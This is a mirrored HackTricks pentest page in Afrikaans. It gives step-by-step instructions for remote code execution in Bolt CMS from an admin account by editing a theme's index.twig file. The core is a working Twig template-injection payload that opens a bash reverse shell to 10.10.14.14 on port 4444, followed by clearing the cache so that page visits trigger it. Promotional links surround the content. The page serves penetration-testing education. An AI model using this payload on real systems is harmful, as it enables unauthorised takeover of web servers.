mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
3.3 KiB
3.3 KiB
Bolt CMS
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling van eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github-opslag.
RCE
Na aanmelding as admin (gaan na /bot om die aanmeldingsvenster te sien), kan jy RCE kry in Bolt CMS:
- Kies
Configuration->View Configuration->Main Configurationof gaan na die URL-pad/bolt/file-edit/config?file=/bolt/config.yaml - Kontroleer die waarde van die tema
- Kies
File management->View & edit templates - Kies die tema basis wat in die vorige stap gevind is (
base-2021in hierdie geval) en kiesindex.twig - In my geval is dit in die URL-pad /bolt/file-edit/themes?file=/base-2021/index.twig
- Stel jou lading in hierdie lêer via template injection (Twig), soos:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - En stoor veranderinge
- Maak die cache skoon in
Maintenance->Clear the cache - Besoek weer die bladsy as 'n gewone gebruiker, en die lading behoort uitgevoer te word
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai Kyk na die INSKRYWINGSPLANNE!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek Die PEASS Familie, ons versameling van eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou haktruuks deur PRs in te dien by die HackTricks en HackTricks Cloud github-opslag.